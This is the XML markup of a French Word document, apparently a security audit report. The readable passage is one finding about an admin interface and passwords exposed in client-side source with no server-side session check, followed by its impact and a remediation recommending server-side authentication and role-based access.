    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2605DA76" w14:textId="66F54EE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 xml:space="preserve">Description : L'interface d'administration et les données sensibles (logins/mots de passe dans </w:t>
      </w:r>
      <w:r w:rsidRPr="0D95A8FE" w:rsidR="5DE66CCC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono" w:eastAsia="Roboto Mono" w:cs="Roboto Mono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fakeDB</w:t>
      </w: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) sont présentes directement dans le code source envoyé au navigateur. Aucune vérification de session n'est effectuée côté serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="1455D3BD" w14:textId="4EFE44A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Impact : Confidentialité nulle. N'importe quel utilisateur peut inspecter le code source pour voir la liste des comptes ou accéder aux formulaires normalement protégés.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="254CEA38" w14:textId="614DC6C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</w:pPr>
      <w:r w:rsidRPr="0D95A8FE" w:rsidR="5DE66CC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fr-FR"/>
        </w:rPr>
        <w:t>Remédiation : Ne jamais envoyer de données sensibles (mots de passe) au client. Implémenter une authentification robuste (JWT, Sessions) et restreindre l'affichage des composants selon le rôle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="13331771" w14:textId="7CC3B727">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="1E2B3723" w14:textId="7F7D892C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="71B706E1" w14:textId="2695D376">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidRPr="00C95B07" w:rsidR="009E4AF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7D01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA02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E1C7AAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10D0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9FE68A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11DC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3524C66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DF2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6694BC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD8CFF40"/>
    <w:lvl w:ilvl="0" w:tplc="0A14F238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9D32C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CEC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F407719"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6B6449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C96042"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BC8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94B3B8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F51E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D897DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B50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89A7DA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB9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DA61E95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E19C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0BE4E47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88D2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1152BDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF22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4FC7345"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB74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FA84CA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02801F64"/>
    <w:lvl w:ilvl="0" w:tplc="705E6018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8D41EA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3510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E6A0D47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9326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8"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="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73308604">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1148279362">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="138573069">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1462111163">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="158539936">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1612783598">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1706326337">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1808277611">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1811707503">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1890994197">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1943536905">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2054574650">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="499731641">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="580214130">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="727416505">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="785933281">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="797380883">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="8539612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A9"/>
    <w:rsid w:val="00001ABF"/>
    <w:rsid w:val="000060DC"/>
    <w:rsid w:val="000078BB"/>
    <w:rsid w:val="00011C64"/>
    <w:rsid w:val="00015064"/>
    <w:rsid w:val="0002231C"/>
    <w:rsid w:val="00022B75"/>
    <w:rsid w:val="00024C3F"/>
    <w:rsid w:val="000303EF"/>
    <w:rsid w:val="000317D1"/>
    <w:rsid w:val="000359F6"/>
    <w:rsid w:val="00035B5B"/>
    <w:rsid w:val="00043758"/>
    <w:rsid w:val="00050790"/>
    <w:rsid w:val="00050823"/>
    <w:rsid w:val="000550FB"/>
    <w:rsid w:val="00060AA1"/>
    <w:rsid w:val="00061E95"/>
    <w:rsid w:val="000641AE"/>
    <w:rsid w:val="0006610D"/>
    <w:rsid w:val="0008266F"/>
    <w:rsid w:val="000846F8"/>
    <w:rsid w:val="0009072B"/>
    <w:rsid w:val="00091446"/>
    <w:rsid w:val="00095077"/>
    <w:rsid w:val="000A6EC9"/>
    <w:rsid w:val="000A75E6"/>
    <w:rsid w:val="000B4B2B"/>
    <w:rsid w:val="000B4FE5"/>
    <w:rsid w:val="000B7DAC"/>
    <w:rsid w:val="000C6092"/>
    <w:rsid w:val="000D32AF"/>
    <w:rsid w:val="000D3640"/>
    <w:rsid w:val="000E22A9"/>
    <w:rsid w:val="000E5710"/>
    <w:rsid w:val="000F1D49"/>
    <w:rsid w:val="000F2ABA"/>
    <w:rsid w:val="0010570F"/>
    <w:rsid w:val="001117B9"/>
    <w:rsid w:val="00116F42"/>
    <w:rsid w:val="001227BB"/>
    <w:rsid w:val="00127DFB"/>
    <w:rsid w:val="0013037E"/>
    <w:rsid w:val="0013137B"/>
    <w:rsid w:val="00142122"/>
    <w:rsid w:val="00142364"/>
    <w:rsid w:val="00145798"/>
    <w:rsid w:val="00150859"/>
    <w:rsid w:val="00156287"/>
    <w:rsid w:val="00164577"/>
    <w:rsid w:val="001670D8"/>
    <w:rsid w:val="00171288"/>
    <w:rsid w:val="0017147D"/>
    <w:rsid w:val="00171EBB"/>
    <w:rsid w:val="00181CD1"/>
    <w:rsid w:val="00182D25"/>
    <w:rsid w:val="00186FAD"/>
    <w:rsid w:val="0019038A"/>
    <w:rsid w:val="001A0863"/>
    <w:rsid w:val="001A0E78"/>
    <w:rsid w:val="001A483B"/>
    <w:rsid w:val="001B1E41"/>
    <w:rsid w:val="001B537F"/>
    <w:rsid w:val="001B67DC"/>
    <w:rsid w:val="001B6D6A"/>
    <w:rsid w:val="001D0A65"/>
    <w:rsid w:val="001D2272"/>
    <w:rsid w:val="001D564B"/>
    <w:rsid w:val="001F3DCA"/>
    <w:rsid w:val="001F44DC"/>
    <w:rsid w:val="001F4E3C"/>
    <w:rsid w:val="001F7470"/>
    <w:rsid w:val="00205645"/>
    <w:rsid w:val="002065F6"/>
    <w:rsid w:val="00213630"/>
    <w:rsid w:val="00214EF5"/>
    <w:rsid w:val="00221CDF"/>
    <w:rsid w:val="00224794"/>
    <w:rsid w:val="00224C9B"/>
    <w:rsid w:val="00230D01"/>
    <w:rsid w:val="00232798"/>
    <w:rsid w:val="00233D1C"/>
    <w:rsid w:val="00241124"/>
    <w:rsid w:val="002441E7"/>
    <w:rsid w:val="0024720A"/>
    <w:rsid w:val="002503C6"/>
    <w:rsid w:val="0025062E"/>
    <w:rsid w:val="00252BC0"/>
    <w:rsid w:val="00254CAD"/>
    <w:rsid w:val="00255C93"/>
    <w:rsid w:val="00260366"/>
    <w:rsid w:val="00263685"/>
    <w:rsid w:val="00270494"/>
    <w:rsid w:val="00270D6C"/>
    <w:rsid w:val="00271970"/>
    <w:rsid w:val="00272A7F"/>
    <w:rsid w:val="0027612C"/>
    <w:rsid w:val="002762B0"/>
    <w:rsid w:val="00277F24"/>
    <w:rsid w:val="00283E84"/>
    <w:rsid w:val="002A2090"/>
    <w:rsid w:val="002B3661"/>
    <w:rsid w:val="002C17AA"/>
    <w:rsid w:val="002C68B6"/>
    <w:rsid w:val="002C7584"/>
    <w:rsid w:val="002D25E8"/>
    <w:rsid w:val="002D2A93"/>
    <w:rsid w:val="002D4D84"/>
    <w:rsid w:val="002E0A77"/>
    <w:rsid w:val="002E28CF"/>
    <w:rsid w:val="002E4E81"/>
    <w:rsid w:val="002E576A"/>
    <w:rsid w:val="002E6ED3"/>
    <w:rsid w:val="002F040C"/>
    <w:rsid w:val="003012C4"/>
    <w:rsid w:val="00303CFC"/>
    <w:rsid w:val="00305F41"/>
    <w:rsid w:val="003100DE"/>
    <w:rsid w:val="00310DF1"/>
    <w:rsid w:val="00311A00"/>
    <w:rsid w:val="003136D8"/>
    <w:rsid w:val="00314AB4"/>
    <w:rsid w:val="0031714A"/>
    <w:rsid w:val="00322DAC"/>
    <w:rsid w:val="0032566E"/>
    <w:rsid w:val="00327AA9"/>
    <w:rsid w:val="00333227"/>
    <w:rsid w:val="003351A8"/>
    <w:rsid w:val="0035664E"/>
    <w:rsid w:val="003606A2"/>
    <w:rsid w:val="00362245"/>
    <w:rsid w:val="00365289"/>
    <w:rsid w:val="0036667D"/>
    <w:rsid w:val="003763DB"/>
    <w:rsid w:val="00383F0D"/>
    <w:rsid w:val="003A27DF"/>
    <w:rsid w:val="003A2D86"/>
    <w:rsid w:val="003A7014"/>
    <w:rsid w:val="003B1267"/>
    <w:rsid w:val="003B14A4"/>
    <w:rsid w:val="003B26A4"/>
    <w:rsid w:val="003B2E67"/>
    <w:rsid w:val="003B3C3A"/>
    <w:rsid w:val="003D2998"/>
    <w:rsid w:val="003D53F1"/>
    <w:rsid w:val="003E08CF"/>
    <w:rsid w:val="003F1923"/>
    <w:rsid w:val="003F4819"/>
    <w:rsid w:val="003F6B0D"/>
    <w:rsid w:val="00401B47"/>
    <w:rsid w:val="00407A22"/>
    <w:rsid w:val="004117AE"/>
    <w:rsid w:val="00420EF6"/>
    <w:rsid w:val="00421A50"/>
    <w:rsid w:val="00423481"/>
    <w:rsid w:val="00425CF4"/>
    <w:rsid w:val="00425DEC"/>
    <w:rsid w:val="00430823"/>
    <w:rsid w:val="00435F7E"/>
    <w:rsid w:val="00440159"/>
    <w:rsid w:val="00446BEF"/>
    <w:rsid w:val="004533CF"/>
    <w:rsid w:val="0045739A"/>
    <w:rsid w:val="00460591"/>
    <w:rsid w:val="00461433"/>
    <w:rsid w:val="00466C66"/>
    <w:rsid w:val="00474B16"/>
    <w:rsid w:val="00476109"/>
    <w:rsid w:val="00476A5A"/>
    <w:rsid w:val="00486420"/>
    <w:rsid w:val="00492C58"/>
    <w:rsid w:val="004A03F8"/>
    <w:rsid w:val="004A4C24"/>
    <w:rsid w:val="004A583E"/>
    <w:rsid w:val="004A5A0C"/>
    <w:rsid w:val="004A5BF5"/>
    <w:rsid w:val="004A6C55"/>
    <w:rsid w:val="004A70CF"/>
    <w:rsid w:val="004A7435"/>
    <w:rsid w:val="004B29C3"/>
    <w:rsid w:val="004B5BF7"/>
    <w:rsid w:val="004B6FEC"/>
    <w:rsid w:val="004C1E99"/>
    <w:rsid w:val="004D3554"/>
    <w:rsid w:val="004D614F"/>
    <w:rsid w:val="004D6CFC"/>
    <w:rsid w:val="004F4D98"/>
    <w:rsid w:val="00506C70"/>
    <w:rsid w:val="00506DCA"/>
    <w:rsid w:val="00507AED"/>
    <w:rsid w:val="00511B0F"/>
    <w:rsid w:val="005145D7"/>
    <w:rsid w:val="00514CD9"/>
    <w:rsid w:val="00524D76"/>
    <w:rsid w:val="00526FE3"/>
    <w:rsid w:val="00532431"/>
    <w:rsid w:val="00535E5C"/>
    <w:rsid w:val="00543C94"/>
    <w:rsid w:val="0054798D"/>
    <w:rsid w:val="005561EE"/>
    <w:rsid w:val="0057489F"/>
    <w:rsid w:val="00575FDE"/>
    <w:rsid w:val="00583BD5"/>
    <w:rsid w:val="005915B2"/>
    <w:rsid w:val="005A1A08"/>
    <w:rsid w:val="005A202A"/>
    <w:rsid w:val="005A2D02"/>
    <w:rsid w:val="005B16DA"/>
    <w:rsid w:val="005B18C5"/>
    <w:rsid w:val="005D5781"/>
    <w:rsid w:val="005D6E43"/>
    <w:rsid w:val="005E0F41"/>
    <w:rsid w:val="005E211B"/>
    <w:rsid w:val="005E2AA5"/>
    <w:rsid w:val="005E3539"/>
    <w:rsid w:val="005E751F"/>
    <w:rsid w:val="005F73BF"/>
    <w:rsid w:val="005F76E2"/>
    <w:rsid w:val="00601C4A"/>
    <w:rsid w:val="00603B14"/>
    <w:rsid w:val="0061315F"/>
    <w:rsid w:val="006161AD"/>
    <w:rsid w:val="00616BF6"/>
    <w:rsid w:val="00617862"/>
    <w:rsid w:val="006242D5"/>
    <w:rsid w:val="00625187"/>
    <w:rsid w:val="00626758"/>
    <w:rsid w:val="00636701"/>
    <w:rsid w:val="00636E27"/>
    <w:rsid w:val="006405E3"/>
    <w:rsid w:val="006409F3"/>
    <w:rsid w:val="00647238"/>
    <w:rsid w:val="00657424"/>
    <w:rsid w:val="00660677"/>
    <w:rsid w:val="0066104B"/>
    <w:rsid w:val="006638BA"/>
    <w:rsid w:val="00663B51"/>
    <w:rsid w:val="006650C6"/>
    <w:rsid w:val="0066518A"/>
    <w:rsid w:val="00666298"/>
    <w:rsid w:val="006749E9"/>
    <w:rsid w:val="00675972"/>
    <w:rsid w:val="00677CBB"/>
    <w:rsid w:val="00682168"/>
    <w:rsid w:val="0068722A"/>
    <w:rsid w:val="00687A12"/>
    <w:rsid w:val="00690FA1"/>
    <w:rsid w:val="00692F75"/>
    <w:rsid w:val="006937EF"/>
    <w:rsid w:val="006959A9"/>
    <w:rsid w:val="006A1776"/>
    <w:rsid w:val="006B0CBF"/>
    <w:rsid w:val="006C0501"/>
    <w:rsid w:val="006C5390"/>
    <w:rsid w:val="006D1378"/>
    <w:rsid w:val="006D5968"/>
    <w:rsid w:val="006E0D13"/>
    <w:rsid w:val="006E10C7"/>
    <w:rsid w:val="006E6E08"/>
    <w:rsid w:val="007013FD"/>
    <w:rsid w:val="00703249"/>
    <w:rsid w:val="00720D1A"/>
    <w:rsid w:val="00722A9A"/>
    <w:rsid w:val="007346B7"/>
    <w:rsid w:val="00737BED"/>
    <w:rsid w:val="007449EA"/>
    <w:rsid w:val="0075511F"/>
    <w:rsid w:val="00755D82"/>
    <w:rsid w:val="0075769A"/>
    <w:rsid w:val="00763E02"/>
    <w:rsid w:val="00765013"/>
    <w:rsid w:val="00766EC8"/>
    <w:rsid w:val="00774E85"/>
    <w:rsid w:val="007807AE"/>
    <w:rsid w:val="00782616"/>
    <w:rsid w:val="00782B2A"/>
    <w:rsid w:val="00784950"/>
    <w:rsid w:val="00794EDA"/>
    <w:rsid w:val="007A09A2"/>
    <w:rsid w:val="007A6760"/>
    <w:rsid w:val="007B046E"/>
    <w:rsid w:val="007B4D68"/>
    <w:rsid w:val="007B51F8"/>
    <w:rsid w:val="007B703F"/>
    <w:rsid w:val="007C11BE"/>
    <w:rsid w:val="007C1475"/>
    <w:rsid w:val="007C1F93"/>
    <w:rsid w:val="007C2D76"/>
    <w:rsid w:val="007C7927"/>
    <w:rsid w:val="007D593A"/>
    <w:rsid w:val="007E2335"/>
    <w:rsid w:val="007E5F4F"/>
    <w:rsid w:val="007F2177"/>
    <w:rsid w:val="007F5BF0"/>
    <w:rsid w:val="00806AEB"/>
    <w:rsid w:val="008076A6"/>
    <w:rsid w:val="0081420C"/>
    <w:rsid w:val="008175E8"/>
    <w:rsid w:val="00820978"/>
    <w:rsid w:val="0082104D"/>
    <w:rsid w:val="0082392B"/>
    <w:rsid w:val="008263F3"/>
    <w:rsid w:val="00830146"/>
    <w:rsid w:val="00832509"/>
    <w:rsid w:val="00834289"/>
    <w:rsid w:val="008461E5"/>
    <w:rsid w:val="00846B5C"/>
    <w:rsid w:val="00847F80"/>
    <w:rsid w:val="008516AA"/>
    <w:rsid w:val="00853F03"/>
    <w:rsid w:val="008557F8"/>
    <w:rsid w:val="0086605A"/>
    <w:rsid w:val="0086641A"/>
    <w:rsid w:val="00866967"/>
    <w:rsid w:val="008729C0"/>
    <w:rsid w:val="00882116"/>
    <w:rsid w:val="00893275"/>
    <w:rsid w:val="008947A9"/>
    <w:rsid w:val="008955BF"/>
    <w:rsid w:val="00895B62"/>
    <w:rsid w:val="008A3C8D"/>
    <w:rsid w:val="008A43A5"/>
    <w:rsid w:val="008A7463"/>
    <w:rsid w:val="008B0D09"/>
    <w:rsid w:val="008B1959"/>
    <w:rsid w:val="008B25B4"/>
    <w:rsid w:val="008B4BDE"/>
    <w:rsid w:val="008B5DF5"/>
    <w:rsid w:val="008B7E08"/>
    <w:rsid w:val="008C00B2"/>
    <w:rsid w:val="008C38A5"/>
    <w:rsid w:val="008C64A5"/>
    <w:rsid w:val="008D05F4"/>
    <w:rsid w:val="008D2DF9"/>
    <w:rsid w:val="008D42F0"/>
    <w:rsid w:val="008E13CD"/>
    <w:rsid w:val="008F07F2"/>
    <w:rsid w:val="008F55AB"/>
    <w:rsid w:val="008F55B4"/>
    <w:rsid w:val="008F7B42"/>
    <w:rsid w:val="00905567"/>
    <w:rsid w:val="00913D8B"/>
    <w:rsid w:val="00914686"/>
    <w:rsid w:val="00915E43"/>
    <w:rsid w:val="00917A29"/>
    <w:rsid w:val="00926880"/>
    <w:rsid w:val="00930A0D"/>
    <w:rsid w:val="00930FBC"/>
    <w:rsid w:val="0093410E"/>
    <w:rsid w:val="009419EB"/>
    <w:rsid w:val="00943286"/>
    <w:rsid w:val="0094475C"/>
    <w:rsid w:val="009457F8"/>
    <w:rsid w:val="00951D85"/>
    <w:rsid w:val="00952AEB"/>
    <w:rsid w:val="0095371E"/>
    <w:rsid w:val="00955D81"/>
    <w:rsid w:val="00963B50"/>
    <w:rsid w:val="00964C11"/>
    <w:rsid w:val="00975E43"/>
    <w:rsid w:val="00976E41"/>
    <w:rsid w:val="00983A33"/>
    <w:rsid w:val="00984921"/>
    <w:rsid w:val="00993E87"/>
    <w:rsid w:val="00994F13"/>
    <w:rsid w:val="0099610A"/>
    <w:rsid w:val="009A088B"/>
    <w:rsid w:val="009A18BC"/>
    <w:rsid w:val="009A6033"/>
    <w:rsid w:val="009B640F"/>
    <w:rsid w:val="009C08DA"/>
    <w:rsid w:val="009C115B"/>
    <w:rsid w:val="009C1FF8"/>
    <w:rsid w:val="009C4E4E"/>
    <w:rsid w:val="009E4AFC"/>
    <w:rsid w:val="009E4C95"/>
    <w:rsid w:val="009E7D47"/>
    <w:rsid w:val="009F786A"/>
    <w:rsid w:val="009F7E4D"/>
    <w:rsid w:val="00A136BE"/>
    <w:rsid w:val="00A16139"/>
    <w:rsid w:val="00A23275"/>
    <w:rsid w:val="00A33279"/>
    <w:rsid w:val="00A33670"/>
    <w:rsid w:val="00A34170"/>
    <w:rsid w:val="00A34E78"/>
    <w:rsid w:val="00A43F66"/>
    <w:rsid w:val="00A45BA3"/>
    <w:rsid w:val="00A4624D"/>
    <w:rsid w:val="00A46F73"/>
    <w:rsid w:val="00A50ED1"/>
    <w:rsid w:val="00A605A1"/>
    <w:rsid w:val="00A6374B"/>
    <w:rsid w:val="00A64A1C"/>
    <w:rsid w:val="00A702D7"/>
    <w:rsid w:val="00A722D6"/>
    <w:rsid w:val="00A77FB3"/>
    <w:rsid w:val="00A8338F"/>
    <w:rsid w:val="00A856B8"/>
    <w:rsid w:val="00A85B78"/>
    <w:rsid w:val="00A96F40"/>
    <w:rsid w:val="00A97D08"/>
    <w:rsid w:val="00AA0FE3"/>
    <w:rsid w:val="00AA5D53"/>
    <w:rsid w:val="00AA73DD"/>
    <w:rsid w:val="00AA7FBA"/>
    <w:rsid w:val="00AB158F"/>
    <w:rsid w:val="00AB4973"/>
    <w:rsid w:val="00AB5ED7"/>
    <w:rsid w:val="00AB6AF8"/>
    <w:rsid w:val="00AC2651"/>
    <w:rsid w:val="00AC3711"/>
    <w:rsid w:val="00AC59B6"/>
    <w:rsid w:val="00AD68CF"/>
    <w:rsid w:val="00AE0E73"/>
    <w:rsid w:val="00AE126C"/>
    <w:rsid w:val="00AE26BA"/>
    <w:rsid w:val="00AE34D8"/>
    <w:rsid w:val="00AE538F"/>
    <w:rsid w:val="00AF17EC"/>
    <w:rsid w:val="00AF371C"/>
    <w:rsid w:val="00AF6E61"/>
    <w:rsid w:val="00B05980"/>
    <w:rsid w:val="00B06323"/>
    <w:rsid w:val="00B123F5"/>
    <w:rsid w:val="00B13054"/>
    <w:rsid w:val="00B218D1"/>
    <w:rsid w:val="00B314AC"/>
    <w:rsid w:val="00B31595"/>
    <w:rsid w:val="00B335B8"/>
    <w:rsid w:val="00B33C81"/>
    <w:rsid w:val="00B353DA"/>
    <w:rsid w:val="00B35DF3"/>
    <w:rsid w:val="00B43E65"/>
    <w:rsid w:val="00B6090A"/>
    <w:rsid w:val="00B6419C"/>
    <w:rsid w:val="00B64271"/>
    <w:rsid w:val="00B65EB9"/>
    <w:rsid w:val="00B71E30"/>
    <w:rsid w:val="00B75FD4"/>
    <w:rsid w:val="00B84D73"/>
    <w:rsid w:val="00B931B0"/>
    <w:rsid w:val="00BB6199"/>
    <w:rsid w:val="00BB78F7"/>
    <w:rsid w:val="00BC674A"/>
    <w:rsid w:val="00BD4DFA"/>
    <w:rsid w:val="00BD71FF"/>
    <w:rsid w:val="00BE3DBB"/>
    <w:rsid w:val="00BF13E9"/>
    <w:rsid w:val="00BF3384"/>
    <w:rsid w:val="00BF7391"/>
    <w:rsid w:val="00BF7B6D"/>
    <w:rsid w:val="00C00F0F"/>
    <w:rsid w:val="00C0341D"/>
    <w:rsid w:val="00C14342"/>
    <w:rsid w:val="00C15834"/>
    <w:rsid w:val="00C36941"/>
    <w:rsid w:val="00C509A7"/>
    <w:rsid w:val="00C540A9"/>
    <w:rsid w:val="00C56094"/>
    <w:rsid w:val="00C57580"/>
    <w:rsid w:val="00C658FF"/>
    <w:rsid w:val="00C667D3"/>
    <w:rsid w:val="00C72B5A"/>
    <w:rsid w:val="00C80DD5"/>
    <w:rsid w:val="00C81A7E"/>
    <w:rsid w:val="00C8701E"/>
    <w:rsid w:val="00C9059F"/>
    <w:rsid w:val="00C9128C"/>
    <w:rsid w:val="00C948C7"/>
    <w:rsid w:val="00C95B07"/>
    <w:rsid w:val="00C96DDC"/>
    <w:rsid w:val="00CA0E53"/>
    <w:rsid w:val="00CA2A05"/>
    <w:rsid w:val="00CA310E"/>
    <w:rsid w:val="00CB0C08"/>
    <w:rsid w:val="00CB29D2"/>
    <w:rsid w:val="00CC0DBF"/>
    <w:rsid w:val="00CC0F87"/>
    <w:rsid w:val="00CC1D4B"/>
    <w:rsid w:val="00CC51B4"/>
    <w:rsid w:val="00CD05BB"/>
    <w:rsid w:val="00CD5E3C"/>
    <w:rsid w:val="00CE4D6B"/>
    <w:rsid w:val="00CE7065"/>
    <w:rsid w:val="00CF0E77"/>
    <w:rsid w:val="00CF2707"/>
    <w:rsid w:val="00D00B8E"/>
    <w:rsid w:val="00D0147E"/>
    <w:rsid w:val="00D023EA"/>
    <w:rsid w:val="00D05C56"/>
    <w:rsid w:val="00D110B4"/>
    <w:rsid w:val="00D17A69"/>
    <w:rsid w:val="00D24AB8"/>
    <w:rsid w:val="00D26898"/>
    <w:rsid w:val="00D324A0"/>
    <w:rsid w:val="00D36530"/>
    <w:rsid w:val="00D37507"/>
    <w:rsid w:val="00D4269B"/>
    <w:rsid w:val="00D51975"/>
    <w:rsid w:val="00D525CB"/>
    <w:rsid w:val="00D60CC4"/>
    <w:rsid w:val="00D61CE3"/>
    <w:rsid w:val="00D74F4F"/>
    <w:rsid w:val="00D916E8"/>
    <w:rsid w:val="00D91BF1"/>
    <w:rsid w:val="00D93977"/>
    <w:rsid w:val="00D94DF6"/>
    <w:rsid w:val="00DA1E84"/>
    <w:rsid w:val="00DA3A3E"/>
    <w:rsid w:val="00DB5396"/>
    <w:rsid w:val="00DB71BA"/>
    <w:rsid w:val="00DC09F8"/>
    <w:rsid w:val="00DC105A"/>
    <w:rsid w:val="00DC7184"/>
    <w:rsid w:val="00DC7250"/>
    <w:rsid w:val="00DD2DC6"/>
    <w:rsid w:val="00DD68A9"/>
    <w:rsid w:val="00DD6EFC"/>
    <w:rsid w:val="00DD7489"/>
    <w:rsid w:val="00DD7A4F"/>
    <w:rsid w:val="00DE5B83"/>
    <w:rsid w:val="00DE5D30"/>
    <w:rsid w:val="00DF28BC"/>
    <w:rsid w:val="00DF365D"/>
    <w:rsid w:val="00DF601F"/>
    <w:rsid w:val="00E12C4A"/>
    <w:rsid w:val="00E13657"/>
    <w:rsid w:val="00E13B3D"/>
    <w:rsid w:val="00E21511"/>
    <w:rsid w:val="00E24430"/>
    <w:rsid w:val="00E2476A"/>
    <w:rsid w:val="00E254B5"/>
    <w:rsid w:val="00E354E9"/>
    <w:rsid w:val="00E47F9A"/>
    <w:rsid w:val="00E55386"/>
    <w:rsid w:val="00E5646B"/>
    <w:rsid w:val="00E60957"/>
    <w:rsid w:val="00E60E77"/>
    <w:rsid w:val="00E6267A"/>
    <w:rsid w:val="00E62D5A"/>
    <w:rsid w:val="00E71FC1"/>
    <w:rsid w:val="00E75A5B"/>
    <w:rsid w:val="00E76903"/>
    <w:rsid w:val="00E9205F"/>
    <w:rsid w:val="00E9577D"/>
    <w:rsid w:val="00EA5FC1"/>
    <w:rsid w:val="00EA7A5B"/>
    <w:rsid w:val="00EB3131"/>
    <w:rsid w:val="00EB3300"/>
    <w:rsid w:val="00EB5F4B"/>
    <w:rsid w:val="00EB7738"/>
    <w:rsid w:val="00EC1665"/>
    <w:rsid w:val="00EC453A"/>
    <w:rsid w:val="00EC7547"/>
    <w:rsid w:val="00ED0882"/>
    <w:rsid w:val="00ED0CCB"/>
    <w:rsid w:val="00ED143A"/>
    <w:rsid w:val="00ED3CC6"/>
    <w:rsid w:val="00ED6183"/>
    <w:rsid w:val="00ED79E3"/>
    <w:rsid w:val="00EE4915"/>
    <w:rsid w:val="00EE4DD2"/>
    <w:rsid w:val="00EE5098"/>
    <w:rsid w:val="00EE71BD"/>
    <w:rsid w:val="00EF0ABD"/>
    <w:rsid w:val="00EF46EC"/>
    <w:rsid w:val="00EF4EFA"/>
    <w:rsid w:val="00EF6CDE"/>
    <w:rsid w:val="00F006B9"/>
    <w:rsid w:val="00F0124C"/>
    <w:rsid w:val="00F03B0E"/>
    <w:rsid w:val="00F046D6"/>
    <w:rsid w:val="00F05E9E"/>
    <w:rsid w:val="00F05FCB"/>
    <w:rsid w:val="00F07156"/>
    <w:rsid w:val="00F14E94"/>
    <w:rsid w:val="00F17683"/>
    <w:rsid w:val="00F2279E"/>
    <w:rsid w:val="00F249CA"/>
    <w:rsid w:val="00F263F7"/>
    <w:rsid w:val="00F27DAF"/>
    <w:rsid w:val="00F33881"/>
    <w:rsid w:val="00F33C49"/>
    <w:rsid w:val="00F50470"/>
    <w:rsid w:val="00F5792E"/>
    <w:rsid w:val="00F646C0"/>
    <w:rsid w:val="00F72A0D"/>
    <w:rsid w:val="00F80D76"/>
    <w:rsid w:val="00F820C7"/>
    <w:rsid w:val="00F83EC3"/>
    <w:rsid w:val="00F90375"/>
    <w:rsid w:val="00F91C2F"/>
